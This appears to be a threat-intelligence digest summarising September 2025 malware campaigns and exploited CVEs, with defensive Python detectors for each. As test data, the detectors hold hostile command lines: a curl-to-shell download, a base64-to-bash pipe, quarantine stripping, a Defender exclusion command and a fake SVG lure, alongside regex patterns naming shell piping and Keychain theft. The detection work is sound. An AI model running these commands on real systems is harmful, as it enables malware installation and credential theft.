Cyber Digests

No noise - cyber threat landscape

Researchers have demonstrated a novel AI-powered ransomware proof-of-concept that autonomously orchestrates the full attack lifecycle, highlighting a significant future threat.
* The technique uses large language models (LLMs) to synthesize malicious code at runtime, adapting to the target environment for reconnaissance, payload generation and personalized extortion without human intervention.
* The proof-of-concept evaded detection by major antivirus vendors: because the generated code and the telemetry it produces differ from run to run, the attack is polymorphic and hard to signature or track.
* The findings underscore how easily LLMs can be co-opted for cybercriminal operations, posing unique detection challenges and raising concerns about the effectiveness of current AI safety features.

Latest mentioned: 09-05
Earliest mentioned: 09-03

A new China-aligned group is compromising Windows servers globally with previously undocumented custom malware to run SEO fraud as a service, manipulating Google search rankings on behalf of third-party gambling sites.
* The toolset includes a passive C++ backdoor and a trojanized IIS module that rewrites responses served to Googlebot so that the compromised site appears to link to the gambling sites, creating artificial backlinks.
* Initial access is most likely SQL injection, followed by PowerShell-driven deployment of custom tools, including privilege escalation exploits (Potato variants) and a website information collector.
* At least 65 servers across diverse sectors have been compromised, with activity concentrated in South America and South Asia; some of the tools are signed with valid code-signing certificates.
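
One way to spot the Googlebot-only backlink injection described above is to request the same page with a browser user agent and with Googlebot's user agent and diff the external links. The following Python is an added example written for this digest, not ESET's code or the group's tooling; the HTTP client is injectable, and the two HTML bodies are constructed samples standing in for a clean and a tampered response. The hostnames are placeholders.

```python
"""Cloaking check: compare external links served to a browser and to Googlebot.
Added example; fetcher is injectable so the check runs offline against the
constructed responses at the bottom."""
from html.parser import HTMLParser
from urllib.parse import urlparse

GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/128.0 Safari/537.36"


class _LinkCollector(HTMLParser):
    """Collects the href of every <a> element in a document."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def external_hosts(html, own_host):
    """Return the set of hostnames linked from `html` other than the site itself."""
    parser = _LinkCollector()
    parser.feed(html)
    hosts = set()
    for href in parser.hrefs:
        host = urlparse(href).hostname  # None for relative links, mailto:, etc.
        if host and host.lower() != own_host.lower():
            hosts.add(host.lower())
    return hosts


def cloaked_backlinks(fetch, url):
    """Fetch `url` as a browser and as Googlebot; return the external hosts that
    appear only in the crawler's view. `fetch(url, user_agent)` returns the body."""
    own_host = urlparse(url).hostname
    browser_view = external_hosts(fetch(url, BROWSER_UA), own_host)
    crawler_view = external_hosts(fetch(url, GOOGLEBOT_UA), own_host)
    return sorted(crawler_view - browser_view)


# Constructed responses standing in for a compromised IIS server.
CLEAN_PAGE = """<html><body><h1>Acme Corp</h1>
<a href="/about">About</a> <a href="https://partner.example.net/">Partner</a>
</body></html>"""

CLOAKED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<div style="display:none"><a href="https://bet-site.example/">casino</a>'
    '<a href="https://slots.example/page">slots</a></div></body>',
)


def fake_fetch(url, user_agent):
    """Stand-in for an HTTP client: the injected links are served only to Googlebot."""
    return CLOAKED_PAGE if "Googlebot" in user_agent else CLEAN_PAGE


if __name__ == "__main__":
    print(cloaked_backlinks(fake_fetch, "https://www.acme.example/"))
```

A module may also identify the crawler by source address rather than user agent, so a clean result obtained from outside Google's address ranges is not conclusive. On the server itself, compare the native modules listed by `appcmd list modules` (and the `<globalModules>` section of applicationHost.config) against a known-good baseline.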

Threat actors are actively exploiting a zero-day (CVE-2025-53690) in legacy Sitecore deployments that reused a sample ASP.NET machine key published in Sitecore documentation. Because the key is public, attackers can forge signed ViewState payloads that the server deserializes, yielding remote code execution.
* RCE is triggered through the `/sitecore/blocked.aspx` endpoint and is used to deploy the novel WeepSteel reconnaissance backdoor, which disguises its exfiltrated data as ordinary ViewState responses.
* The multi-stage chain goes on to deploy tunneling tools and RATs, escalate privileges via credential dumping and token impersonation, and establish persistence through service registration and account modifications.
* The issue affects Sitecore Experience products up to version 9.0 that were deployed with the static machine key from pre-2017 documentation; replacing the key with a unique random value, encrypting the machineKey section and rotating it regularly are the critical mitigations.
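
A quick audit of the mitigation above, as an added example (not Sitecore's or Mandiant's code): scan web.config files for a static `<machineKey>`, flag keys that match a list of known sample keys the operator supplies, and generate replacement values. The published Sitecore sample key is deliberately not reproduced here; `SAMPLE_KEY_FROM_GUIDE` below is a constructed placeholder, and the two configs are constructed inputs.

```python
"""Audit ASP.NET <machineKey> settings and generate replacements. Added
example; the sample key and configs below are constructed, not Sitecore's."""
import os
import secrets
import xml.etree.ElementTree as ET


def generate_machine_key():
    """Return fresh (validationKey, decryptionKey) values for <machineKey>:
    64 random bytes for HMACSHA256 validation, 32 random bytes for AES-256."""
    return secrets.token_hex(64).upper(), secrets.token_hex(32).upper()


def audit_machine_key(config_xml, known_sample_keys=()):
    """Return findings for one web.config body: 'static' when explicit keys are
    configured in clear text, 'known-sample-key' when one of them matches a
    supplied sample key, 'weak-validation' for MD5/SHA1, and 'encrypted' when
    the section is protected with a configProtectionProvider."""
    known = {k.upper() for k in known_sample_keys}
    findings = []
    root = ET.fromstring(config_xml)
    for mk in root.iter("machineKey"):
        if mk.get("configProtectionProvider"):
            findings.append("encrypted")
            continue
        validation = mk.get("validationKey", "AutoGenerate")
        decryption = mk.get("decryptionKey", "AutoGenerate")
        if validation.startswith("AutoGenerate") and decryption.startswith("AutoGenerate"):
            continue  # per-machine keys: nothing for an attacker to look up in a guide
        findings.append("static")
        if validation.upper() in known or decryption.upper() in known:
            findings.append("known-sample-key")
        if mk.get("validation", "HMACSHA256").upper() in ("MD5", "SHA1"):
            findings.append("weak-validation")
    return findings


def scan_tree(root_dir, known_sample_keys=()):
    """Walk a directory tree and audit every web.config found."""
    results = {}
    for dirpath, _, filenames in os.walk(root_dir):
        for name in filenames:
            if name.lower() == "web.config":
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8-sig") as fh:
                    results[path] = audit_machine_key(fh.read(), known_sample_keys)
    return results


# Constructed inputs. SAMPLE_KEY_FROM_GUIDE is a placeholder, not the real
# Sitecore documentation key; supply the real one from your own notes.
SAMPLE_KEY_FROM_GUIDE = "0123456789ABCDEF" * 8
STATIC_CONFIG = f"""<configuration><system.web>
  <machineKey validationKey="{SAMPLE_KEY_FROM_GUIDE}"
              decryptionKey="{SAMPLE_KEY_FROM_GUIDE[:48]}"
              validation="SHA1" decryption="AES"/>
</system.web></configuration>"""
AUTO_CONFIG = """<configuration><system.web>
  <machineKey validationKey="AutoGenerate,IsolateApps"
              decryptionKey="AutoGenerate,IsolateApps"/>
</system.web></configuration>"""

if __name__ == "__main__":
    print(audit_machine_key(STATIC_CONFIG, [SAMPLE_KEY_FROM_GUIDE]))
    print(audit_machine_key(AUTO_CONFIG))
    print(generate_machine_key())
```

Rotating the key invalidates in-flight ViewState and forms-authentication tickets, and every node in a web farm must receive the same new value. Once replaced, the section can be encrypted in place with the .NET Framework tool `aspnet_regiis -pe "system.web/machineKey" -app "/<site path>"`, which is the encryption step the mitigation refers to.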

A Lazarus subgroup has been observed exploiting a suspected Chrome zero-day to deploy three distinct RATs, PondRAT, ThemeForestRAT and RemotePE, in a campaign targeting financial and cryptocurrency firms. The group's TTPs include social engineering over Telegram, credential harvesting and custom reconnaissance tooling. The attack chain runs from social engineering through exploitation and discovery to next-stage deployment, with the actor replacing the simpler RATs with the more capable RemotePE once it wants deeper access. Organizations should harden endpoint telemetry, monitor for phantom DLL loading, inspect anomalous Windows Performance Monitor files, audit HTTP(S) traffic for unusual patterns and enforce multi-factor authentication.

Latest mentioned: 09-05
Earliest mentioned: 09-01

A new campaign uses a novel Terminal-based execution method to deploy a macOS stealer, sidestepping Gatekeeper and posing a significant threat to enterprise data.
* Victims are tricked into pasting a command into Terminal; because the payload is fetched and run by the user's own shell rather than launched from a quarantined download, Gatekeeper never examines it, and the stealer goes on to establish persistence and exfiltrate data.
* The malware targets browser credentials, cryptocurrency wallets, Keychain items and a range of personal and enterprise files.
* Its sandbox-evasion capabilities and broad data-theft potential underline the evolving risk to macOS environments.
* Organizations must prioritize user education against this social-engineering pattern and implement defense in depth beyond the built-in OS protections.

Latest mentioned: 09-06
Earliest mentioned: 09-05
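
The pasted command leaves traces in shell history and process telemetry. The following Python is an added example for this digest, not code from the researchers who reported the campaign: it scores commands for the patterns this technique relies on (a download piped straight into a shell, a base64 blob decoded into a shell, stripping the quarantine attribute, inline AppleScript, Keychain reads) and looks one layer inside base64-encoded arguments. The history lines are constructed, including the hostname.

```python
"""Flag paste-into-Terminal execution patterns in zsh history. Added example;
the history below is constructed."""
import base64
import re

# macOS base64 takes -D/--decode, GNU base64 takes -d; both are matched.
INDICATORS = {
    "remote_pipe_to_shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(sh|bash|zsh)\b"),
    "base64_decode_to_shell": re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^|]*\|\s*(sudo\s+)?(sh|bash|zsh)\b"),
    "quarantine_strip": re.compile(r"\bxattr\b[^;&|]*\s-[a-z]*d\s+com\.apple\.quarantine"),
    "osascript_inline": re.compile(r"\bosascript\s+-e\b"),
    "keychain_read": re.compile(r"\bsecurity\s+(find-(generic|internet)-password|dump-keychain)\b"),
    "background_detach": re.compile(r"\bnohup\b|&\s*disown\b"),
}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
ZSH_EXTENDED = re.compile(r"^: (\d+):\d+;(.*)$")   # ": <epoch>:<elapsed>;<command>"


def decode_embedded_base64(cmd):
    """Return printable strings hidden inside base64 blobs on a command line."""
    out = []
    for token in B64_TOKEN.findall(cmd):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            out.append(text)
    return out


def analyze_command(cmd):
    """Sorted indicator names matched by `cmd`, including matches found one
    layer down inside base64-encoded arguments (prefixed base64_inner:)."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(cmd)}
    for inner in decode_embedded_base64(cmd):
        hits |= {"base64_inner:" + name for name, rx in INDICATORS.items() if rx.search(inner)}
    return sorted(hits)


def scan_zsh_history(text):
    """Parse zsh history (extended or plain format) and return
    (timestamp, command, indicators) for every line that matched something."""
    results = []
    for line in text.splitlines():
        m = ZSH_EXTENDED.match(line)
        ts, cmd = (int(m.group(1)), m.group(2)) if m else (None, line)
        hits = analyze_command(cmd)
        if hits:
            results.append((ts, cmd, hits))
    return results


# Constructed history: one benign-looking command hides the real one in base64.
INNER_COMMAND = "curl -fsSL https://cdn.example/update.sh | sh"
INNER_B64 = base64.b64encode(INNER_COMMAND.encode()).decode()
SAMPLE_HISTORY = f""": 1725500001:0;ls -la
: 1725500002:0;echo {INNER_B64} | base64 -D | bash
: 1725500003:0;curl -fsSL https://cdn.example/fix.sh | sudo sh
: 1725500004:0;xattr -d com.apple.quarantine ~/Downloads/Installer.app && open ~/Downloads/Installer.app
: 1725500005:0;git status"""

if __name__ == "__main__":
    for ts, cmd, hits in scan_zsh_history(SAMPLE_HISTORY):
        print(ts, hits, cmd[:70])
```

Terminal runs pasted commands through the user's login shell, so `~/.zsh_history` and process-creation telemetry (an EDR or Endpoint Security client) are the places to apply these patterns; history can be disabled or wiped by the same command, so the process telemetry is the more reliable source.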

A sophisticated, previously undetected malware campaign that uses SVG files to impersonate the national justice system was uncovered, demonstrating advanced evasion techniques.
* Attackers embed JavaScript inside SVG files to render a convincing phishing lure and silently drop a malicious ZIP archive.
* The campaign uses code obfuscation, polymorphism and dummy code to evade traditional antivirus detection, with samples dating back to August 2025.
* More than 500 unique samples were identified, distributed mainly by email and showing evolving, adapted payloads.
* The activity shows how modern web formats continue to be used for highly evasive, multi-stage attacks.

Latest mentioned: 09-05
Earliest mentioned: 09-04
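
SVG is XML, so the constructs the lure relies on (`<script>`, `on*` event handlers, `javascript:` links, `foreignObject`, and data: URIs that carry a ZIP rather than an image) can be enumerated with a plain XML parser before the file ever reaches a renderer. The scanner below is an added example, not code from the researchers or from the campaign; the lure SVG it runs on is constructed, with a fake four-byte ZIP header standing in for the dropped archive.

```python
"""Static triage of SVG attachments. Added example; LURE_SVG is constructed."""
import base64
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote_to_bytes

EVENT_ATTR = re.compile(r"^on[a-z]+$", re.I)
OBFUSCATION = re.compile(r"atob\(|fromCharCode|unescape\(|eval\(", re.I)
ZIP_MAGIC = b"PK\x03\x04"


def _local(qname):
    """Strip the XML namespace from a tag or attribute name."""
    return qname.split("}", 1)[-1]


def _parse_data_uri(value):
    """Return (mime, is_base64, payload) for a data: URI, else None."""
    if not value.lower().startswith("data:"):
        return None
    header, sep, payload = value[5:].partition(",")
    if not sep:
        return None
    params = header.split(";")
    mime = params[0] or "text/plain"
    is_b64 = "base64" in (p.lower() for p in params[1:])
    return mime, is_b64, payload


def _check_href(element, value):
    if value.lower().startswith("javascript:"):
        return [("javascript_href", value[:60])]
    parsed = _parse_data_uri(value)
    if parsed is None:
        return []
    mime, is_b64, payload = parsed
    try:
        blob = base64.b64decode(payload) if is_b64 else unquote_to_bytes(payload)
    except ValueError:
        return [("malformed_data_uri", mime)]
    if blob.startswith(ZIP_MAGIC):
        return [("embedded_zip", f"{mime} {len(blob)} bytes")]
    if element == "image" and mime.startswith("image/"):
        return []  # an ordinary embedded raster image
    return [("data_uri:" + mime, "")]


def scan_svg(svg_source):
    """Return (kind, detail) findings in document order."""
    findings = []
    root = ET.fromstring(svg_source)
    for el in root.iter():
        name = _local(el.tag) if isinstance(el.tag, str) else ""
        if name == "script":
            body = (el.text or "").strip()
            findings.append(("inline_script", body[:60]))
            if OBFUSCATION.search(body):
                findings.append(("obfuscation_hint", ",".join(sorted(set(OBFUSCATION.findall(body))))))
        elif name == "foreignObject":
            findings.append(("foreign_object", ""))
        for attr, value in el.attrib.items():
            aname = _local(attr)
            if EVENT_ATTR.match(aname):
                findings.append(("event_handler:" + aname.lower(), value[:60]))
            elif aname == "href":
                findings.extend(_check_href(name, value.strip()))
    return findings


# Constructed lure: a notice that drops a (fake, 42-byte) ZIP via a data: link.
FAKE_ZIP_B64 = base64.b64encode(ZIP_MAGIC + b"\x00" * 26 + b"lure.pdf.exe").decode()
LURE_SVG = f"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="600" height="400" onload="init()">
  <rect width="600" height="400" fill="#f4f4f4"/>
  <text x="40" y="60">Judicial notification</text>
  <script><![CDATA[
    var p = "UEsDBA"; function init() {{ var z = atob(p); location.href = "data:application/zip;base64," + p; }}
  ]]></script>
  <a xlink:href="data:application/zip;base64,{FAKE_ZIP_B64}">Download the citation</a>
  <image href="data:image/png;base64,iVBORw0KGgo="/>
</svg>"""
CLEAN_SVG = """<svg xmlns="http://www.w3.org/2000/svg"><circle r="10"/></svg>"""

if __name__ == "__main__":
    for kind, detail in scan_svg(LURE_SVG):
        print(kind, detail)
```

Any of `inline_script`, `event_handler:*`, `javascript_href` or `embedded_zip` in a mailed SVG is reason enough to quarantine it: a legitimate logo or diagram needs none of them. Heavily obfuscated samples may build the data: URI at runtime, so treat `obfuscation_hint` as a strong signal even when no ZIP is found statically.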

A newly identified, secretive malware-as-a-service (MaaS) operation, TAG-150, is distributing custom remote access Trojans (RATs) and commercial infostealers to critical organizations, including government entities.
* The group has no visible Dark Web presence, suggesting an exclusive, sophisticated customer base.
* TAG-150 developed two variants of its custom CastleRAT, in C and in Python; the Python version is built for stealth, adds itself to Windows Defender's exclusions and largely evades antivirus detection.
* Early operations used CastleLoader in over 1,600 attacks with a 28.7% infection rate, and leveraged Steam gaming communities as dead drops for C2 addresses.
* The operation has potential links to ransomware activity and is expected to expand its custom malware development and distribution.

Latest mentioned: 09-05
Earliest mentioned: 09-05

Acronis TRU details a surge in campaigns abusing ConnectWise ScreenConnect to deploy multiple RATs against U.S. organizations with evolving, stealthy tactics.
* Malicious ClickOnce ScreenConnect installers fetch their components at runtime, so little of the final payload is present on disk for traditional detection.
* An initial dual deployment of AsyncRAT and a custom PowerShell RAT evolved to include PureHVNC, delivered via WMI and hollowed into trusted processes.
* Persistence shifted from noisy scheduled tasks to stealthier batch/VBS loaders and encoded .NET assemblies, showing high attacker adaptability.
* Attackers reuse preconfigured Windows Server 2022 VMs to redeploy their infrastructure rapidly, and the privileged access they obtain looks like legitimate RMM activity.

Latest mentioned: 09-05
Earliest mentioned: 09-05

A novel cryptojacking campaign abuses Windows' `charmap.exe` to hide cryptocurrency mining.
* The attack starts with a spear-phishing email carrying a malicious shortcut, which runs a dropper that injects a custom miner directly into the legitimate Character Map process.
* Running in memory inside a trusted signed binary, the miner leaves little on disk for file-based antivirus and blends into normal process activity, hindering behaviour-based detection.
* Persistence is maintained through a scheduled task and DLL side-loading via `werfault.exe`.
* Victims see severe performance degradation and higher energy consumption, with the healthcare and education sectors notably affected.

Latest mentioned: 09-05
Earliest mentioned: 09-04
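
The three Windows-side items above (the CastleRAT Defender exclusion, ScreenConnect and WMI launching script hosts, and the charmap.exe miner with its werfault.exe side-load) all leave telemetry that a few process, network and image-load rules can catch. The following Python is an added example, not code from the vendors whose reports the digest summarizes; it runs four rules over constructed events shaped like Sysmon Event ID 1 (process create), 3 (network connection) and 7 (image load) records plus a Defender 5007 configuration-change event. Paths, the ScreenConnect instance hash, IPs and command lines in the sample events are made up.

```python
"""Detection rules for the Windows telemetry the three items above produce.
Added example; SAMPLE_EVENTS are constructed, not real log records."""
from pathlib import PureWindowsPath

SYSMON = "Microsoft-Windows-Sysmon"
DEFENDER = "Microsoft-Windows-Windows Defender"
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
RMM_PARENTS = {"screenconnect.clientservice.exe", "wmiprvse.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")


def _name(path):
    return PureWindowsPath(path).name.lower()


def defender_exclusion_added(ev):
    """Catch the 5007 configuration-change event for a new exclusion, or the
    PowerShell cmdlet invocation that creates one."""
    if ev.get("source") == DEFENDER and ev.get("id") == 5007:
        return "\\exclusions\\" in ev.get("message", "").lower()
    if ev.get("source") == SYSMON and ev.get("id") == 1:
        cl = ev.get("command_line", "").lower()
        return any(flag in cl for flag in ("-exclusionpath", "-exclusionprocess", "-exclusionextension"))
    return False


def rmm_spawns_script_host(ev):
    """ScreenConnect's client service or the WMI provider host launching a scripting host."""
    return (ev.get("source") == SYSMON and ev.get("id") == 1
            and _name(ev.get("parent_image", "")) in RMM_PARENTS
            and _name(ev.get("image", "")) in SCRIPT_HOSTS)


def charmap_network_connection(ev):
    """Character Map has no reason to talk to the network; an injected miner does."""
    return ev.get("source") == SYSMON and ev.get("id") == 3 and _name(ev.get("image", "")) == "charmap.exe"


def werfault_sideload(ev):
    """werfault.exe loading a DLL from outside the Windows system directories."""
    if not (ev.get("source") == SYSMON and ev.get("id") == 7 and _name(ev.get("image", "")) == "werfault.exe"):
        return False
    return not ev.get("image_loaded", "").lower().startswith(SYSTEM_DIRS)


RULES = [
    ("defender_exclusion_added", defender_exclusion_added),
    ("rmm_spawns_script_host", rmm_spawns_script_host),
    ("charmap_network_connection", charmap_network_connection),
    ("werfault_sideload", werfault_sideload),
]


def evaluate(events):
    """Return (event_index, rule_name) for every rule that fires."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES if rule(ev)]


SAMPLE_EVENTS = [
    {"source": SYSMON, "id": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files (x86)\ScreenConnect Client (0123abcd)\ScreenConnect.ClientService.exe",
     "command_line": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"source": SYSMON, "id": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Users\victim\AppData\Local\Temp\update.exe",
     "command_line": "powershell Add-MpPreference -ExclusionPath C:\\Users\\Public"},
    {"source": DEFENDER, "id": 5007,
     "message": "Microsoft Defender Antivirus Configuration has changed. New value: "
                "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Users\\Public = 0x0"},
    {"source": SYSMON, "id": 3, "image": r"C:\Windows\System32\charmap.exe",
     "destination_ip": "203.0.113.10", "destination_port": 3333},
    {"source": SYSMON, "id": 7, "image": r"C:\Windows\System32\WerFault.exe",
     "image_loaded": r"C:\Users\victim\AppData\Local\Temp\wer\faultrep.dll"},
    # benign controls
    {"source": SYSMON, "id": 7, "image": r"C:\Windows\System32\WerFault.exe",
     "image_loaded": r"C:\Windows\System32\faultrep.dll"},
    {"source": SYSMON, "id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "powershell Get-Process"},
    {"source": SYSMON, "id": 3, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "destination_ip": "203.0.113.20", "destination_port": 443},
]

if __name__ == "__main__":
    for index, rule in evaluate(SAMPLE_EVENTS):
        print(rule, SAMPLE_EVENTS[index])
```

The ScreenConnect rule will also fire on legitimate help-desk sessions that run scripts, so scope it to hosts where the instance ID in the parent path is not one of your own.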

A sophisticated spearphishing campaign targets corporate executives with lookalike OneDrive document-sharing notifications to steal credentials. The emails impersonate internal HR communications, using subject lines about salary amendments to create urgency, and both the messages and the login pages are personalized with the recipient's details to enhance authenticity. Attackers send through Amazon SES and rotate across 80 domains to evade detection. Anti-detection techniques include inserting hidden characters into trigger words and obfuscating them in both the light- and dark-mode renderings of the email, so that keyword filters miss text a human still reads normally. Phishing URLs are single-use and stop working after the first visit, which complicates incident response. The focus on C-level targets and trusted communication themes calls for a blend of user awareness, technical controls and proactive threat hunting.

Latest mentioned: 09-05
Earliest mentioned: 09-02
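
The trigger-word obfuscation above works because filters match the raw HTML while people read the rendered text. The following Python is an added example, not the researchers' detection logic: it renders an HTML email into the text a recipient actually sees, stripping invisible code points (zero-width characters and soft hyphens are assumed to be the "hidden characters" involved) and dropping text hidden by inline CSS, then matches trigger words against that. The sample email is constructed.

```python
"""Render an HTML email the way a reader sees it before keyword matching.
Added example; SAMPLE_EMAIL is constructed."""
import re
from html.parser import HTMLParser

# Zero-width characters and the soft hyphen: invisible when rendered, but
# they break naive substring matching on the source.
INVISIBLE = dict.fromkeys(map(ord, "\u200b\u200c\u200d\u2060\ufeff\u00ad"), None)
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|font-size\s*:\s*0(?:px|pt|em)?\b"
    r"|opacity\s*:\s*0(?:\.0+)?\b|max-height\s*:\s*0(?:px)?\b", re.I)
VOID = {"area", "base", "br", "col", "embed", "hr", "img", "input", "link",
        "meta", "source", "track", "wbr"}


class RenderedText(HTMLParser):
    """Split an HTML email into the text a recipient sees and the text that is
    present in the source but hidden by inline CSS or non-rendered elements."""

    def __init__(self):
        super().__init__()
        self.visible, self.hidden = [], []
        self._stack = []          # one bool per open element: hidden or not
        self._hidden_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in VOID:
            return
        style = dict(attrs).get("style") or ""
        hidden = tag in ("head", "title", "style", "script") or bool(HIDDEN_STYLE.search(style))
        self._stack.append(hidden)
        self._hidden_depth += hidden

    def handle_endtag(self, tag):
        if tag in VOID or not self._stack:
            return
        self._hidden_depth -= self._stack.pop()

    def handle_data(self, data):
        (self.hidden if self._hidden_depth else self.visible).append(data)


def _normalize(text):
    return re.sub(r"\s+", " ", text.translate(INVISIBLE)).strip()


def rendered_text(html):
    """Return (visible_text, hidden_text), both with invisible characters removed.
    Visible fragments are concatenated without separators so that a word split
    by a hidden <span> is reassembled."""
    parser = RenderedText()
    parser.feed(html)
    parser.close()
    return _normalize("".join(parser.visible)), _normalize(" ".join(parser.hidden))


def trigger_words(html, words):
    """Trigger words a human would read in the rendered email."""
    visible = rendered_text(html)[0].lower()
    return [w for w in words if w.lower() in visible]


# Constructed lure: the keywords are split by a zero-width space (&#8203;),
# a font-size:0 span, a zero-width non-joiner and a soft hyphen, and a
# preheader of benign text is hidden from the reader but visible to filters.
SAMPLE_EMAIL = """<html><head><title>Document shared</title></head><body>
<div style="display:none;max-height:0;overflow:hidden">Quarterly newsletter and company picnic photos</div>
<p>Hi Dana, your sal&#8203;ary amend<span style="font-size:0">xq</span>ment is ready in One&zwnj;Drive.</p>
<p>Re&shy;view it here: <a href="https://docs-share.example/s/abc">Open document</a></p>
</body></html>"""

if __name__ == "__main__":
    print(rendered_text(SAMPLE_EMAIL))
    print(trigger_words(SAMPLE_EMAIL, ["salary", "amendment", "password"]))
```

Text coloured to match the background cannot be judged without the rendering context, so this parser reports it as visible; the light/dark-mode trick the campaign uses needs a check of the `prefers-color-scheme` styles in addition to the inline-CSS rules here.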

CISA has issued an urgent warning about active exploitation of two critical vulnerabilities in popular TP-Link router models, posing significant risk to home and small-business networks.
* The flaws, CVE-2025-9377 (OS command injection) and CVE-2023-50224 (authentication bypass), allow arbitrary command execution and credential access, respectively.
* Both vulnerabilities have been added to CISA's Known Exploited Vulnerabilities (KEV) catalog, with a mandatory remediation deadline for federal agencies.
* Many affected devices are end-of-life, which complicates patching and prolongs the exposure of their users.
* CISA strongly recommends retiring unsupported devices and applying the vendor mitigations to the rest.

CISA has issued an urgent alert about an actively exploited use-after-free vulnerability (CVE-2025-48543) in the Android Runtime.
* The flaw can be chained to escape the Chrome sandbox and escalate privileges locally on affected devices.
* Active exploitation means a real risk of full device control, data theft or malicious app installation.
* Federal agencies must apply the vendor patches by September 25, 2025 under the KEV mandate; other organizations and users should patch on the same timeline.

Latest mentioned: 09-05
Earliest mentioned: 09-03

A critical vulnerability (CVE-2025-55190) in Argo CD lets low-privileged, project-scoped API tokens retrieve every repository credential associated with a project, bypassing the intended isolation. Rated CVSS 10.0, the flaw means a token with nothing more than `get` permission on a project can read the usernames and passwords of that project's repositories. Exploitation can lead to cloning of private codebases, injection of malicious manifests and downstream supply chain attacks. Unpatched releases in the 2.13 through 3.1 lines are affected, which covers many large enterprises relying on Argo CD for mission-critical deployments. Administrators are urged to upgrade to a patched version (3.1.2, 3.0.14, 2.14.16 or 2.13.9) immediately.

Latest mentioned: 09-05
Earliest mentioned: 09-05
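
A way to size the blast radius before upgrading, as an added example rather than Argo CD's own tooling: parse the Casbin-style RBAC policy (the `policy.csv` in `argocd-rbac-cm`, plus any AppProject role policies) and list every subject that can `get` a project, since under this CVE that read returns the project's repository credentials. Matching approximates Argo CD's rules: `*` wildcards in resource and action, glob matching on the object, `g` lines resolved transitively, and an explicit `deny` overriding `allow`. Object globbing uses `fnmatch`, which is adequate for project names without slashes but is not Argo CD's exact matcher. The policy and project list are constructed; the first two policy lines mirror Argo CD's built-in `role:readonly`.

```python
"""Who can read project details (and, under CVE-2025-55190, repo credentials)?
Added example; SAMPLE_POLICY and SAMPLE_PROJECTS are constructed."""
import fnmatch


def parse_policy(text):
    """Parse policy.csv lines into (policies, groupings).
    p, subject, resource, action, object, effect   /   g, member, role"""
    policies, groupings = [], []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = [p.strip() for p in line.split(",")]
        if parts[0] == "p" and len(parts) == 6:
            policies.append(tuple(parts[1:]))
        elif parts[0] == "g" and len(parts) == 3:
            groupings.append((parts[1], parts[2]))
    return policies, groupings


def effective_subjects(subject, groupings):
    """The subject plus every role it inherits through g lines, transitively."""
    seen, frontier = {subject}, [subject]
    while frontier:
        current = frontier.pop()
        for member, role in groupings:
            if member == current and role not in seen:
                seen.add(role)
                frontier.append(role)
    return seen


def is_allowed(subject, resource, action, obj, policies, groupings):
    """Argo CD semantics: at least one matching allow and no matching deny."""
    subjects = effective_subjects(subject, groupings)
    allowed = denied = False
    for sub, res, act, pattern, effect in policies:
        if (sub in subjects and res in (resource, "*") and act in (action, "*")
                and fnmatch.fnmatchcase(obj, pattern)):
            allowed |= effect == "allow"
            denied |= effect == "deny"
    return allowed and not denied


def project_get_exposure(policy_text, projects):
    """Map each subject that can `get` at least one project to those projects."""
    policies, groupings = parse_policy(policy_text)
    subjects = {p[0] for p in policies} | {g[0] for g in groupings}
    exposure = {}
    for subject in sorted(subjects):
        readable = [pr for pr in projects
                    if is_allowed(subject, "projects", "get", pr, policies, groupings)]
        if readable:
            exposure[subject] = readable
    return exposure


# Constructed policy. proj:team-a:ci is a project-scoped role of the kind
# whose tokens the CVE concerns; the auditor's deny line shows deny winning.
SAMPLE_POLICY = """
p, role:readonly, applications, get, */*, allow
p, role:readonly, projects, get, *, allow
p, role:ci-deployer, applications, sync, team-a/*, allow
p, proj:team-a:ci, projects, get, team-a, allow
p, auditor@example.com, projects, get, finance, deny
g, ci-bot, role:readonly
g, auditor@example.com, role:readonly
"""
SAMPLE_PROJECTS = ["team-a", "finance"]

if __name__ == "__main__":
    for subject, projects in project_get_exposure(SAMPLE_POLICY, SAMPLE_PROJECTS).items():
        print(f"{subject}: {projects}")
```

Every subject the report lists is an identity whose token, if leaked or held by a low-trust automation, could have pulled repository credentials before the upgrade; rotate those credentials rather than only patching.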

A critical ABAP code injection vulnerability (CVE-2025-42957) in SAP S/4HANA and related products is being exploited in the wild, allowing low-privileged users to achieve full system takeover.
* Exploit development is trivial: the patch is easy to reverse-engineer and ABAP code is open to inspection.
* Successful exploitation enables data theft and manipulation, privilege escalation, backdoor accounts, credential theft and operational disruption.
